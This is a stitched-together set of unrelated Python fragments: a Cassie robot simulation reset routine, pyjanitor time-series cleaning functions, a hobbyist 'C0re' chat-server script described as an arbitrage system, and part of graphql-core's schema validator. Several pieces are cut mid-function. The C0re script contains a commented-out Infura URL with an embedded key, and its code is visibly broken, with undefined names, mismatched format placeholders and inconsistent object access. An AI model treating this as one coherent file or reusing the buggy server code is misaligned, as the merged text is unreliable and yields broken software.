right_knee_com_range = [[0.023, 0.023], [0.03207, 0.03207], [ 0.002181, 0.002181]] # 54->56
knee_spring_com_range = [[0.0836, 0.0836], [0.0034, 0.0034], [0.0, 0.0]] # 21->23 and 57->59
left_shin_com_range = [[0.18338, 0.18338], [0.001169, 0.001169], [ 0.0002123, 0.0002123]] # 24->26
right_shin_com_range = [[0.18338, 0.18338], [0.001169, 0.001169], [-0.0002123, -0.0002123]] # 60->62
left_tarsus_com_range = [[0.11046, 0.11046], [-0.03058, -0.03058], [-0.00131, -0.00131]] # 27->29
right_tarsus_com_range = [[0.11046, 0.11046], [-0.03058, -0.03058], [ 0.00131, 0.00131]] # 63->65
heel_com_range = [[0.081, 0.081], [0.0022, 0.0022], [0.0, 0.0]] # 30->32 and 66->68
left_fcrank_com_range = [[0.00493, 0.00493], [0.00002, 0.00002], [-0.00215, -0.00215]] # 33->35 and 69->71
right_fcrank_com_range = [[0.00493, 0.00493], [0.00002, 0.00002], [ 0.00215, 0.00215]] # 33->35 and 69->71
prod_com_range = [[0.17792, 0.17792], [0.0, 0.0], [0.0, 0.0]] # 36->38 and 72->74
left_foot_com_range = [[0.00474, 0.00474], [0.02748, 0.02748], [-0.00014, -0.00014]] # 39->41 and 75->77
right_foot_com_range = [[0.00474, 0.00474], [0.02748, 0.02748], [ 0.00014, 0.00014]] # 39->41 and 75->77
left_com = left_hip_com_range + achilles_com_range + left_knee_com_range + knee_spring_com_range + left_shin_com_range + left_tarsus_com_range + heel_com_range + left_fcrank_com_range + prod_com_range + left_foot_com_range
right_com = right_hip_com_range + achilles_com_range + right_knee_com_range + knee_spring_com_range + right_shin_com_range + right_tarsus_com_range + heel_com_range + right_fcrank_com_range + prod_com_range + right_foot_com_range
com_range = [[0, 0], [0, 0], [0, 0]] + pelvis_com_range + left_com + right_com
com_noise = [np.random.uniform(a, b) for a, b in com_range]
"""
self.sim.set_dof_damping(np.clip(damp_noise, 0, None))
self.sim.set_body_mass(np.clip(mass_noise, 0, None))
self.sim.set_body_ipos(np.clip(com_noise, 0, None))
self.phase = random.randint(0, self.phaselen)
self.time = 0
self.counter = 0
qpos, qvel = self.get_ref_state(self.phase)
self.sim.set_qpos(qpos)
self.sim.set_qvel(qvel)
# Need to reset u? Or better way to reset cassie_state than taking step
self.cassie_state = self.sim.step_pd(self.u)
self.speed = (random.randint(0, 10)) / 10
# maybe make ref traj only send relevant idxs?
ref_pos, ref_vel = self.get_ref_state(self.phase)
self.prev_action = ref_pos[self.pos_idx]
return self.get_full_state()
# used for plotting against the reference trajectory
def reset_for_test(self):
self.phase = 0
self.time = 0
self.counter = 0
qpos, qvel = self.get_ref_state(self.phase)
self.sim.set_qpos(qpos)
self.sim.set_qvel(qvel)
# maybe make ref traj only send relevant idxs?
ref_pos, ref_vel = self.get_ref_state(self.phase)
self.prev_action = ref_pos[self.pos_idx]
# Need to reset u? Or better way to reset | |
<filename>janitor/timeseries.py
""" Time series-specific data cleaning functions. """
import itertools
from typing import Dict, Union
import pandas as pd
import pandas_flavor as pf
from janitor import check
from .errors import JanitorError
@pf.register_dataframe_method
def fill_missing_timestamps(
df: pd.DataFrame,
frequency: str,
first_time_stamp: pd.Timestamp = None,
last_time_stamp: pd.Timestamp = None,
) -> pd.DataFrame:
"""
Fill dataframe with missing timestamps based on a defined frequency.
If timestamps are missing,
this function will reindex the dataframe.
If timestamps are not missing,
then the function will return the dataframe unmodified.
Functional usage example:
.. code-block:: python
import pandas as pd
import janitor.timeseries
df = pd.DataFrame(...)
df = janitor.timeseries.fill_missing_timestamps(
df=df,
frequency="1H",
)
Method chaining example:
.. code-block:: python
import pandas as pd
import janitor.timeseries
df = (
pd.DataFrame(...)
.fill_missing_timestamps(frequency="1H")
)
:param df: Dataframe which needs to be tested for missing timestamps
:param frequency: frequency i.e. sampling frequency of the data.
Acceptable frequency strings are available
`here <https://pandas.pydata.org/pandas-docs/stable/>`_
Check offset aliases under time series in user guide
:param first_time_stamp: timestamp expected to start from
Defaults to None.
If no input is provided assumes the minimum value in time_series
:param last_time_stamp: timestamp expected to end with.
Defaults to None.
If no input is provided, assumes the maximum value in time_series
:returns: dataframe that has a complete set of contiguous datetimes.
"""
# Check all the inputs are the correct data type
check("frequency", frequency, [str])
check("first_time_stamp", first_time_stamp, [pd.Timestamp, type(None)])
check("last_time_stamp", last_time_stamp, [pd.Timestamp, type(None)])
if first_time_stamp is None:
first_time_stamp = df.index.min()
if last_time_stamp is None:
last_time_stamp = df.index.max()
# Generate expected timestamps
expected_timestamps = pd.date_range(
start=first_time_stamp, end=last_time_stamp, freq=frequency
)
return df.reindex(expected_timestamps)
def _get_missing_timestamps(
df: pd.DataFrame,
frequency: str,
first_time_stamp: pd.Timestamp = None,
last_time_stamp: pd.Timestamp = None,
) -> pd.DataFrame:
"""
Return the timestamps that are missing in a dataframe.
This function takes in a dataframe,
and checks its index against a dataframe
that contains the expected timestamps.
Here, we assume that the expected timestamps
are going to be of a larger size
than the timestamps available in the input dataframe ``df``.
If there are any missing timestamps in the input dataframe,
this function will return those missing timestamps
from the expected dataframe.
"""
expected_df = df.fill_missing_timestamps(
frequency, first_time_stamp, last_time_stamp
)
missing_timestamps = expected_df.index.difference(df.index)
return expected_df.loc[missing_timestamps]
@pf.register_dataframe_method
def sort_timestamps_monotonically(
df: pd.DataFrame, direction: str = "increasing", strict: bool = False
) -> pd.DataFrame:
"""
Sort dataframe such that index is monotonic.
If timestamps are monotonic,
this function will return the dataframe unmodified.
If timestamps are not monotonic,
then the function will sort the dataframe.
Functional usage example:
.. code-block:: python
import pandas as pd
import janitor.timeseries
df = pd.DataFrame(...)
df = janitor.timeseries.sort_timestamps_monotonically(
direction="increasing"
)
Method chaining example:
.. code-block:: python
import pandas as pd
import janitor.timeseries
df = (
pd.DataFrame(...)
.sort_timestamps_monotonically(direction="increasing")
)
:param df: Dataframe which needs to be tested for monotonicity
:param direction: type of monotonicity desired.
Acceptable arguments are:
1. increasing
2. decreasing
:param strict: flag to enable/disable strict monotonicity.
If set to True,
will remove duplicates in the index,
by retaining first occurrence of value in index.
If set to False,
will not test for duplicates in the index.
Defaults to False.
:returns: Dataframe that has monotonically increasing
(or decreasing) timestamps.
"""
# Check all the inputs are the correct data type
check("df", df, [pd.DataFrame])
check("direction", direction, [str])
check("strict", strict, [bool])
# Remove duplicates if requested
if strict:
df = df[~df.index.duplicated(keep="first")]
# Sort timestamps
if direction == "increasing":
df = df.sort_index()
else:
df = df.sort_index(ascending=False)
# Return the dataframe
return df
def _flag_jumps_single_col(
df: pd.DataFrame,
col: str,
scale: str,
direction: str,
threshold: Union[int, float],
) -> pd.Series:
"""
Creates a boolean column that flags whether or not the change
between consecutive rows in the provided dataframe column exceeds a
provided threshold.
Comparisons are always performed utilizing a GREATER THAN
threshold check. Thus, flags correspond to values that EXCEED
the provided threshold.
The method used to create consecutive row comparisons is set by the
`scale` argument. A `scale=absolute` corresponds to a difference
method (`.diff()`) and a `scale=percentage` corresponds to a
percentage change methods (`pct_change()`).
A `direction` argument is used to determine how to handle the sign
of the difference or percentage change methods.
A `direction=increasing` will only consider consecutive rows that
are increasing in value and exceeding the provided threshold.
A `direction=decreasing` will only consider consecutive rows that
are decreasing in value and exceeding the provided threshold.
If `direction=any`, the absolute value is taken for both the
difference method and the percentage change methods and the sign
between consecutive rows is ignored.
"""
check("scale", scale, [str])
check("direction", direction, [str])
check("threshold", threshold, [int, float])
scale_types = ["absolute", "percentage"]
if scale not in scale_types:
raise JanitorError(
f"Unrecognized scale: '{scale}'. Must be one of: {scale_types}."
)
direction_types = ["increasing", "decreasing", "any"]
if direction not in direction_types:
raise JanitorError(
f"Unrecognized direction: '{direction}'. "
+ f"Must be one of: {direction_types}."
)
if threshold < 0:
raise JanitorError(
f"Unrecognized threshold: {threshold}. "
+ "This value must be >= 0.0. "
+ "Use 'direction' to specify positive or negative intent."
)
single_col = df[col]
single_col_diffs = single_col.diff()
if scale == "percentage":
single_col_pcts = single_col.pct_change()
if direction == "increasing":
# Using diffs ensures correct sign is used for incr/decr
# (see issue #711)
out = (single_col_diffs > 0) & (single_col_pcts.abs() > threshold)
elif direction == "decreasing":
# Using diffs ensures correct sign is used for incr/decr
# (see issue #711)
out = (single_col_diffs < 0) & (single_col_pcts.abs() > threshold)
else:
out = single_col_pcts.abs() > threshold
else:
if direction == "increasing":
out = single_col_diffs > threshold
elif direction == "decreasing":
out = (single_col_diffs < 0) & (single_col_diffs.abs() > threshold)
else:
out = single_col_diffs.abs() > threshold
out = out.astype(int)
return out
@pf.register_dataframe_method
def flag_jumps(
df: pd.DataFrame,
scale: Union[str, Dict[str, str]] = "percentage",
direction: Union[str, Dict[str, str]] = "any",
threshold: Union[int, float, Dict[str, Union[int, float]]] = 0.0,
strict: bool = False,
) -> pd.DataFrame:
"""
Create boolean column(s) that flag whether or not the change
between consecutive rows exceeds a provided threshold.
Functional usage example:
.. code-block:: python
import pandas as pd
import janitor.timeseries
df = pd.DataFrame(...)
df = flag_jumps(
df=df,
scale="absolute",
direction="any",
threshold=2,
)
Method chaining example:
.. code-block:: python
import pandas as pd
import janitor.timeseries
df = (
pd.DatFrame(...)
.flag_jumps(
scale="absolute",
direction="any",
threshold=2,
)
)
Detailed chaining examples:
.. code-block:: python
# Applies specified criteria across all columns of the dataframe
# Appends a flag column for each column in the dataframe
df = (
pd.DataFrame(...)
.flag_jumps(
scale="absolute",
direction="any",
threshold=2
)
)
# Applies specific criteria to certain dataframe columns
# Applies default criteria to columns not specifically listed
# Appends a flag column for each column in the dataframe
df = (
pd.DataFrame(...)
.flag_jumps(
scale=dict(col1="absolute", col2="percentage"),
direction=dict(col1="increasing", col2="any"),
threshold=dict(col1=1, col2=0.5),
)
)
# Applies specific criteria to certain dataframe columns
# Applies default criteria to columns not specifically listed
# Appends a flag column for each column in the dataframe
df = (
pd.DataFrame(...)
.flag_jumps(
scale=dict(col1="absolute"),
direction=dict(col2="increasing"),
)
)
# Applies specific criteria to certain dataframe columns
# Applies default criteria to columns not specifically listed
# Appends a flag column for only those columns found in
# specified criteria
df = (
pd.DataFrame(...)
.flag_jumps(
scale=dict(col1="absolute"),
threshold=dict(col2=1),
strict=True,
)
)
:param df: Dataframe which needs to be flagged for changes between
consecutive rows above a certain threshold.
:param scale: Type of scaling approach to use.
Acceptable arguments are:
1. absolute (consider the difference between rows).
2. percentage (consider the percentage change between rows).
Defaults to percentage.
:param direction: Type of method used to handle the sign change when
comparing consecutive rows.
Acceptable arguments are:
1. increasing (only consider rows that are increasing in value).
2. decreasing (only consider rows that are decreasing in value).
3. any (consider rows that are either increasing or decreasing;
sign is ignored).
Defaults to any.
:param threshold: The value to check if consecutive row comparisons
exceed. Always uses a greater than comparison. Must be >= 0.0.
| |
<gh_stars>0
"""
Open Test Arbatrage System USE AT YOUR OWN RISK!
MULTIPLE EXCHANGE ACCEPTANCE
ALLOWS 'USERS' TO CHOOSE THEIR OWN STRATEGY AS WELL AS TRADING COINS
PROVIDES DETAILED INFORMATION ABOUT EXCHANGES & PLATFORMS
ALLOWS USERS TO CONNECT IN A FRIENDLY ENVIRONMENT
Author: ~Skrypt~
"""
import sys
import os
import time
import shlex
import random
import sha3
import pickle
import hashlib
#from web3 import Web3
#from web3.providers.rpc import HTTPProvider
#from ecdsa import SigningKey, SECP256k1
#web3 = Web3(HTTPProvider('https://mainnet.infura.io/M4QNeQhVp2x0Lm0OxNvW'))
#true = True
#false = False
#from resources import *
from resources.TheCoreData.RawData import *
from resources.PersonaData.PersonaRaw import *
from resources.TheCoreData.CoreResponse import *
#from resources.TheCoreData.CoreSyntax import CoreSyntaxSets
from resources.worlditems import worldItems
from resources.worldnotice import worldNotice
from resources.worldLists import worldLists
from resources.useroptions import userOptions
from resources.worldBoolean import worldBoolean
# import the Environment server class
from resources.server import C0reServer
from resources.TheCoreData.CoreItems import *
from resources.TheCoreData.C0reRoomSystem.C0reRooms import TheC0reRooms
from resources.TheCoreData.C0reUserSystem.UserObject import *
global C0RESUBPATH
global C0RESYNTAXPATH
C0RESUBPATH = './resources/TheCoreData/C0reSyntaxSystem/C0reSubSyntax.cmf'
C0RESYNTAXPATH = './resources/TheCoreData/C0reSyntaxSystem/C0reSyntax.cmf'
users = {}
Total_Users = 0
# starts C0re Server
C0re = C0reServer(input('|[USERNAME]>>: '),hashlib.sha256(input('|[USERNAME]>>: ').encode()).hexdigest())
INTERVAL = 0.2
C0reSub = pickle.load(open(C0RESUBPATH,'rb'))
C0reSyntax = pickle.load(open(C0RESYNTAXPATH,'rb'))
print('Starting C0re Server And Hosting Platform Please Wait A Moment')
while True:
time.sleep(0.2)
# 'update' must be called in the loop to keep the environment running and give
# us up-to-date information
C0re.update()
for id in C0re.get_new_users():
# User IS DEFINED HERE FROM - [Resources.PersonaData.UserObject.py]
users[id] = C0reGuest()
Total_Users += 1
C0re.send_message(id, Eresp["E_Notice_Welcome"].title())
for id in C0re.get_disconnected_users():
if id not in users: continue
for pid,pl in users.items():
C0re.send_message(pid, Eresp["E_Notice_Quit"].format(users[id].Name))
del(users[id])
for id,gak,params in C0re.get_commands():
if id not in users: continue
if users[id].Started == False:
users[id].Name = 'GuestWallet'+str(hex(Total_Users))
users[id].Started = True
for pid,pl in users.items():
usershere = []
if users[pid].Room == users[id].Room:
usershere.append(users[pid].Name)
C0re.send_message(pid, Eresp["E_Notice_Public_Symbol"].title())
C0re.send_message(pid, Eresp["E_Notice_Enter_Message"].format(users[id].Name))
rm = rooms[users[id].Room]
C0re.send_message(id, Eresp["E_Notice_Welcome_0"].format(users[id].Name))
C0re.send_message(id, Eresp['E_Notice_Welcome_1'].format())
C0re.send_message(id, Eresp['E_Notice_Have_Entered'].format(users[id].Room))
C0re.send_message(id, Eresp['E_Notice_Current_Room_Id'].format(users[id].RoomID))
C0re.send_message(id, Eresp['E_Notice_Open_Room_Format'].format(rm["description"]))
C0re.send_message(id, Eresp['E_Notice_Also_Here']+"%s" % ", ".join(usershere).title())
C0re.send_message(id, Eresp['E_Notice_Visible_Exits']+"%s" % ", ".join(rm["exits"]).title())
#Conditions To The Alive Player Below
# Refer to Ess.py for gak list referrences. ~Skrypt
elif gak.lower() in C0reSub:
par = params
par_split = par.split(' ')
Command = C0reSub[gak.lower()]
if 'global' in C0reSyntax[Command]['Rooms'] or users[id].Room_id in C0reSyntax[Command]['Rooms']:
if users[id].User_Level in C0reSyntax[Command]['Users'] or 'global' in C0reSyntax[Command]['Users']:
# Assert Command Match Here
if users[id].C0reTime == 0:
########### Start Of 'Say' Syntax #################################
if Command == 'say':
if TheC0reRooms[users[id].Room].Private == False and TheC0reRooms[users[id].Room].Whisper_Only == False:
if users[id].Special_Speech == False:
C0re.send_message(id, '{0}, \'{1}\''.format(users[id].Speech,params),users[id].Name) # Alert User
elif users[id].Special_Speech == True:
C0re.send_message(id, '{0} and Say, \'{1}\''.format(users[id].Speech,params),user[id].Name) # Alert User
# go through every user in the game
for pid,pl in users.items():
# if they're in the same room as the user
if users[pid].Room == users[id].Room and users[pid].Name != users[id].Name:
if users[id].Special_Speech == False:
C0re.send_message(pid, '{1}s, \'{2}\''.format(users[id].Speech, params),users[id].Name) # Tell Everyone In Room Except User
elif users[id].Special_Speech == True:
C0re.send_message(pid, '{1} and Says, \'{2}\''.format(users[id].Speech,params),users[id].Name)
elif TheC0reRooms[users[id].Room].Private == True or TheC0reRooms[users[id].Room].Whisper_Only == True:
if TheC0reRooms[users[id].Room].Private == True:
C0re.send_message(id, 'I\'m Sorry [{}] This Is A Private Area No Speaking Or Whispering Allowed.'.format(users[id].Name),'Vivian')
for pid,pl in users.items():
if users[pid].Room == users[id].Room and users[pid].Name != users[id].Name:
C0re.send_message(pid, 'Tries But Fails To Speak.',users[id].Name)
elif TheC0reRooms[users[id].Room].Whisper_Only == True:
C0re.send_message(id, 'I\'m Sorry [{}], This Is A Whisper Only Area')
for pid,pl in users.items():
if users[pid].Room == users[id].Room and users[pid].Name != users[id].Name:
C0re.send_message(pid,'Fails To Whisper.',users[id].Name)
######## End Of Say Syntax ###################################################
elif users[id].C0reTime > 0:
users[id].C0reTime += C0reTimeMap[gak.lower()] # Adds Additional C0re-Time To Prevent Server Spam
C0re.send_message(id,'...Please Wait ({}) C0re-Time...'.format(users[id].C0reTime),'Vivian')
elif users[id].User_Level not in C0reSyntax[Command]['Users'] and 'global' not in C0reSyntax[Command]['Users']:
# Assert Command Level Failure
C0re.send_message(id, '[{}] Syntax Is Not A [{}] Privlidge At This Time.'.format(Command,users[id].User_Level),'Vivian')
elif 'global' not in C0reSyntax[Command]['Rooms'] or users[id].Room_id not in C0reSyntax[Command]['Rooms']:
# Assert Command Room Failure
C0re.send_message(id, '[{}] Syntax Is Not Available Within Room [{}] At This Time.'.format(Command,users[id].Room),'Vivian')
else:
C0re.send_message(id, '[{}] Is A Unknown Command Please \'Submit\' A Support Ticket If You Feel This Is A Mistake.')
# 'get' command (Object Initiated) Inventory active needs room objects initiated and sub-surface objects (table items etc.)
elif gak.lower() in Ess["get"]["sets"]:
pa = params.lower()
pa_sub = pa.split(' ')
user_has_item = False
taken = False
try:
if pa_sub[0] == 'my' and pa_sub[1] != '':
for i in users[id]["inventory"]:
if i.Name == pa_sub[1].title():
user_has_item = True
taken = False
elif i.Name == pa_sub[1].title()+' '+pa_sub[2].title():
user_has_item = True
taken = False
if user_has_item == True and taken == False:
if users[id]["left hand"] != [] and users[id]["right hand"] != []:
C0re.send_message(id, "Your Hands Are Full. Maybe STOW Something And Try Again?")
elif users[id]["right hand"] == []:
users[id]["inventory"].remove(i)
users[id]["right hand"].append(i)
taken = True
C0re.send_message(id, "You Get Your {0} From Your Inventory With Your Right Hand.".format(i.Name))
elif users[id]["left hand"] == []:
users[id]["inventory"].remove(i)
users[id]["left hand"].append(i)
taken = True
C0re.send_message(id, "You Get Your {0} From Your Inventory With Your Left Hand.".format(i.Name))
else:
C0re.send_message(id, "Sorry {0}, You Do Not Have {1}.".format(users[id]["name"].title(), i.Name))
else:
C0re.send_message(id, 'What Are You Trying To Get?')
except Exception as Get_What:
C0re.send_message(id, 'What Are You Trying To Get?')
#elif paramTitle in wi: #needs work on this block (items need to be added to WI)
#Evm.send_message(id, "Sorry {0}, You Cannot Get This Period.".format(users[id]["name"].title()))
# 'stow' command (Object Initiated)
elif gak in Ess["stow"]["sets"]:
pa = params.lower()
if users[id]["right hand"] == [] and users[id]["left hand"] == []:
C0re.send_message(id, "You Have Nothing To Stow In Your Hands.")
elif users[id]["right hand"] != [] and pa == "right":
item_to_stow = users[id]["right hand"][0]
users[id]["right hand"].remove(item_to_stow)
users[id]["inventory"].append(item_to_stow)
C0re.send_message(id, "You Put Your {} From Your Right Hand In Your Inventory.".format(item_to_stow.Name))
elif users[id]["left hand"] != [] and pa == "left":
item_to_stow = users[id]["left hand"][0]
users[id]["left hand"].remove(item_to_stow)
users[id]["inventory"].append(item_to_stow)
C0re.send_message(id, "You Put Your {} From Your Left Hand In Your Inventory.".format(item_to_stow.Name))
elif users[id]["right hand"] == [] and pa == "right":
C0re.send_message(id, "You Have Nothing In Your Right Hand To Put In Your Inventory.")
elif users[id]["left hand"] == [] and pa == "left":
C0re.send_message(id, "You Have Nothing In Your Left Hand To Put In Your Inventory.")
elif params == "":
C0re.send_message(id, "Usage Is STOW RIGHT/LEFT.".format())
# 'swap' command (Object Initiated)
elif gak in Ess["swap"]["sets"]:
if users[id]["right hand"] == [] and users[id]["left hand"] == []:
C0re.send_message(id, "You Have Nothing To Swap In Your Hands.")
elif users[id]["right hand"] != [] and users[id]["left hand"] == []:
item_to_swap = users[id]["right hand"][0]
users[id]["right hand"].remove(item_to_swap)
users[id]["left hand"].append(item_to_swap)
C0re.send_message(id, "You Swap Your {} From Your Right Hand To Your Left Hand.".format(item_to_swap.Name))
elif users[id]["right hand"] == [] and users[id]["left hand"] != []:
item_to_swap = users[id]["left hand"][0]
users[id]["left hand"].remove(item_to_swap)
users[id]["right hand"].append(item_to_swap)
C0re.send_message(id, "You Swap Your {} From Your Left Hand To Your Right Hand.".format(item_to_swap.Name))
elif users[id]["right hand"] != [] and users[id]["left hand"] != []:
r = users[id].Body.RightHand[0]
l = users[id].Body.LeftHand[0]
users[id].Body.RightHand.remove(r)
users[id].Body.RightHand.append(l)
users[id].Body.LeftHand.remove(l)
users[id].Body.LeftHand.append(r)
C0re.send_message(id, 'You carefully swap {0} and {1} between your hands.'.format(users[id].Body.LeftHand,users[id].Body.RightHand))
# 'glance' command (Object Initiated)
elif gak.lower() in Ess["glance"]["sets"]:
if users[id]["right hand"] == [] and users[id]["left hand"] == []:
C0re.send_message(id, "You Glance Down At Your Empty Hands.")
elif users[id]["right hand"] != [] and users[id]["left hand"] == []:
C0re.send_message(id, "You Glance Down And See Nothing In Your Left Hand And {} In Your Right Hand.".format(users[id]["right hand"][0].Name))
elif users[id]["right hand"] == [] and users[id]["left hand"] != []:
C0re.send_message(id, "You Glance Down And See Nothing In Your Right Hand And {} In Your Left Hand.".format(users[id]["left hand"][0].Name))
elif users[id]["right hand"] != [] and users[id]["left hand"] != []:
C0re.send_message(id, "You Glance Down And See {0} In Your Right Hand And {1} In Your Left Hand.".format(users[id]["right hand"][0].Name, users[id]["left hand"][0].Name))
# '*say' command
elif gak.lower() in Ess["say change"]["sets"]:
pa = params.lower()
poa = po["user_actions"]
empty = ""
if pa == empty:
Evm.send_message(id, "Please Use *say "+"STYLE ".upper()+"For More Information On "+"STYLE".upper()+" use /*say".title())
if pa not in poa["say_options"] and pa != empty:
if pa not in poa["plural_options"]:
C0re.send_message(id, "that is not an option")
if pa in poa["say_options"]:
C0re.send_message(id, "thank you for choosing ".title()+pa.title())
C0re.send_message(id, "please remember to use *say in the future to alter your options".title())
users[id]["special speech"] = False
users[id]["speech"] = pa
elif pa in poa["plural_options"]:
C0re.send_message(id, "thank you for choosing ".title()+pa.title())
C0re.send_message(id, "please remember to use *say in the future to alter your options".title())
users[id]["special speech"] = True
users[id]["speech"] = pa
# 'inv' command (Object Initiated)
elif gak.lower() in Ess["inventory"]["sets"]:
name = users[id]["name"].title()
# send a message to user with the inventory
if users[id]["inventory"] | |
from operator import attrgetter, itemgetter
from typing import (
Any,
Collection,
Dict,
List,
Optional,
Set,
Tuple,
Union,
cast,
)
from ..error import GraphQLError, located_error
from ..pyutils import inspect
from ..language import (
DirectiveNode,
InputValueDefinitionNode,
InterfaceTypeDefinitionNode,
InterfaceTypeExtensionNode,
NamedTypeNode,
Node,
ObjectTypeDefinitionNode,
ObjectTypeExtensionNode,
OperationType,
SchemaDefinitionNode,
SchemaExtensionNode,
UnionTypeDefinitionNode,
UnionTypeExtensionNode,
)
from .definition import (
GraphQLEnumType,
GraphQLInputField,
GraphQLInputObjectType,
GraphQLInterfaceType,
GraphQLObjectType,
GraphQLUnionType,
is_enum_type,
is_input_object_type,
is_input_type,
is_interface_type,
is_named_type,
is_non_null_type,
is_object_type,
is_output_type,
is_union_type,
is_required_argument,
is_required_input_field,
)
from ..utilities.assert_valid_name import is_valid_name_error
from ..utilities.type_comparators import is_equal_type, is_type_sub_type_of
from .directives import is_directive, GraphQLDeprecatedDirective
from .introspection import is_introspection_type
from .schema import GraphQLSchema, assert_schema
__all__ = ["validate_schema", "assert_valid_schema"]
def validate_schema(schema: GraphQLSchema) -> List[GraphQLError]:
"""Validate a GraphQL schema.
Implements the "Type Validation" sub-sections of the specification's "Type System"
section.
Validation runs synchronously, returning a list of encountered errors, or an empty
list if no errors were encountered and the Schema is valid.
"""
# First check to ensure the provided value is in fact a GraphQLSchema.
assert_schema(schema)
# If this Schema has already been validated, return the previous results.
# noinspection PyProtectedMember
errors = schema._validation_errors
if errors is None:
# Validate the schema, producing a list of errors.
context = SchemaValidationContext(schema)
context.validate_root_types()
context.validate_directives()
context.validate_types()
# Persist the results of validation before returning to ensure validation does
# not run multiple times for this schema.
errors = context.errors
schema._validation_errors = errors
return errors
def assert_valid_schema(schema: GraphQLSchema) -> None:
"""Utility function which asserts a schema is valid.
Throws a TypeError if the schema is invalid.
"""
errors = validate_schema(schema)
if errors:
raise TypeError("\n\n".join(error.message for error in errors))
class SchemaValidationContext:
"""Utility class providing a context for schema validation."""
errors: List[GraphQLError]
schema: GraphQLSchema
def __init__(self, schema: GraphQLSchema):
self.errors = []
self.schema = schema
def report_error(
self,
message: str,
nodes: Union[Optional[Node], Collection[Optional[Node]]] = None,
) -> None:
if nodes and not isinstance(nodes, Node):
nodes = [node for node in nodes if node]
nodes = cast(Optional[Collection[Node]], nodes)
self.add_error(GraphQLError(message, nodes))
def add_error(self, error: GraphQLError) -> None:
self.errors.append(error)
def validate_root_types(self) -> None:
schema = self.schema
query_type = schema.query_type
if not query_type:
self.report_error("Query root type must be provided.", schema.ast_node)
elif not is_object_type(query_type):
self.report_error(
f"Query root type must be Object type, it cannot be {query_type}.",
get_operation_type_node(schema, OperationType.QUERY)
or query_type.ast_node,
)
mutation_type = schema.mutation_type
if mutation_type and not is_object_type(mutation_type):
self.report_error(
"Mutation root type must be Object type if provided,"
f" it cannot be {mutation_type}.",
get_operation_type_node(schema, OperationType.MUTATION)
or mutation_type.ast_node,
)
subscription_type = schema.subscription_type
if subscription_type and not is_object_type(subscription_type):
self.report_error(
"Subscription root type must be Object type if provided,"
f" it cannot be {subscription_type}.",
get_operation_type_node(schema, OperationType.SUBSCRIPTION)
or subscription_type.ast_node,
)
def validate_directives(self) -> None:
directives = self.schema.directives
for directive in directives:
# Ensure all directives are in fact GraphQL directives.
if not is_directive(directive):
self.report_error(
f"Expected directive but got: {inspect(directive)}.",
getattr(directive, "ast_node", None),
)
continue
# Ensure they are named correctly.
self.validate_name(directive)
# Ensure the arguments are valid.
for arg_name, arg in directive.args.items():
# Ensure they are named correctly.
self.validate_name(arg, arg_name)
# Ensure the type is an input type.
if not is_input_type(arg.type):
self.report_error(
f"The type of @{directive.name}({arg_name}:)"
f" must be Input Type but got: {inspect(arg.type)}.",
arg.ast_node,
)
if is_required_argument(arg) and arg.deprecation_reason is not None:
self.report_error(
f"Required argument @{directive.name}({arg_name}:)"
" cannot be deprecated.",
[
get_deprecated_directive_node(arg.ast_node),
arg.ast_node and arg.ast_node.type,
],
)
def validate_name(self, node: Any, name: Optional[str] = None) -> None:
# Ensure names are valid, however introspection types opt out.
try:
if not name:
name = node.name
name = cast(str, name)
ast_node = node.ast_node
except AttributeError: # pragma: no cover
pass
else:
error = is_valid_name_error(name)
if error:
self.add_error(located_error(error, ast_node))
def validate_types(self) -> None:
validate_input_object_circular_refs = InputObjectCircularRefsValidator(self)
for type_ in self.schema.type_map.values():
# Ensure all provided types are in fact GraphQL type.
if not is_named_type(type_):
self.report_error(
f"Expected GraphQL named type but got: {inspect(type_)}.",
type_.ast_node if is_named_type(type_) else None,
)
continue
# Ensure it is named correctly (excluding introspection types).
if not is_introspection_type(type_):
self.validate_name(type_)
if is_object_type(type_):
type_ = cast(GraphQLObjectType, type_)
# Ensure fields are valid
self.validate_fields(type_)
# Ensure objects implement the interfaces they claim to.
self.validate_interfaces(type_)
elif is_interface_type(type_):
type_ = cast(GraphQLInterfaceType, type_)
# Ensure fields are valid.
self.validate_fields(type_)
# Ensure interfaces implement the interfaces they claim to.
self.validate_interfaces(type_)
elif is_union_type(type_):
type_ = cast(GraphQLUnionType, type_)
# Ensure Unions include valid member types.
self.validate_union_members(type_)
elif is_enum_type(type_):
type_ = cast(GraphQLEnumType, type_)
# Ensure Enums have valid values.
self.validate_enum_values(type_)
elif is_input_object_type(type_):
type_ = cast(GraphQLInputObjectType, type_)
# Ensure Input Object fields are valid.
self.validate_input_fields(type_)
# Ensure Input Objects do not contain non-nullable circular references
validate_input_object_circular_refs(type_)
def validate_fields(
self, type_: Union[GraphQLObjectType, GraphQLInterfaceType]
) -> None:
fields = type_.fields
# Objects and Interfaces both must define one or more fields.
if not fields:
self.report_error(
f"Type {type_.name} must define one or more fields.",
[type_.ast_node, *(type_.extension_ast_nodes or ())],
)
for field_name, field in fields.items():
# Ensure they are named correctly.
self.validate_name(field, field_name)
# Ensure the type is an output type
if not is_output_type(field.type):
self.report_error(
f"The type of {type_.name}.{field_name}"
f" must be Output Type but got: {inspect(field.type)}.",
field.ast_node and field.ast_node.type,
)
# Ensure the arguments are valid.
for arg_name, arg in field.args.items():
# Ensure they are named correctly.
self.validate_name(arg, arg_name)
# Ensure the type is an input type.
if not is_input_type(arg.type):
self.report_error(
f"The type of {type_.name}.{field_name}({arg_name}:)"
f" must be Input Type but got: {inspect(arg.type)}.",
arg.ast_node and arg.ast_node.type,
)
if is_required_argument(arg) and arg.deprecation_reason is not None:
self.report_error(
f"Required argument {type_.name}.{field_name}({arg_name}:)"
" cannot be deprecated.",
[
get_deprecated_directive_node(arg.ast_node),
arg.ast_node and arg.ast_node.type,
],
)
def validate_interfaces(
self, type_: Union[GraphQLObjectType, GraphQLInterfaceType]
) -> None:
iface_type_names: Set[str] = set()
for iface in type_.interfaces:
if not is_interface_type(iface):
self.report_error(
f"Type {type_.name} must only implement Interface"
f" types, it cannot implement {inspect(iface)}.",
get_all_implements_interface_nodes(type_, iface),
)
continue
if type_ is iface:
self.report_error(
f"Type {type_.name} cannot implement itself"
" because it would create a circular reference.",
get_all_implements_interface_nodes(type_, iface),
)
if iface.name in iface_type_names:
self.report_error(
f"Type {type_.name} can only implement {iface.name} once.",
get_all_implements_interface_nodes(type_, iface),
)
continue
iface_type_names.add(iface.name)
self.validate_type_implements_ancestors(type_, iface)
self.validate_type_implements_interface(type_, iface)
def validate_type_implements_interface(
self,
type_: Union[GraphQLObjectType, GraphQLInterfaceType],
iface: GraphQLInterfaceType,
) -> None:
type_fields, iface_fields = type_.fields, iface.fields
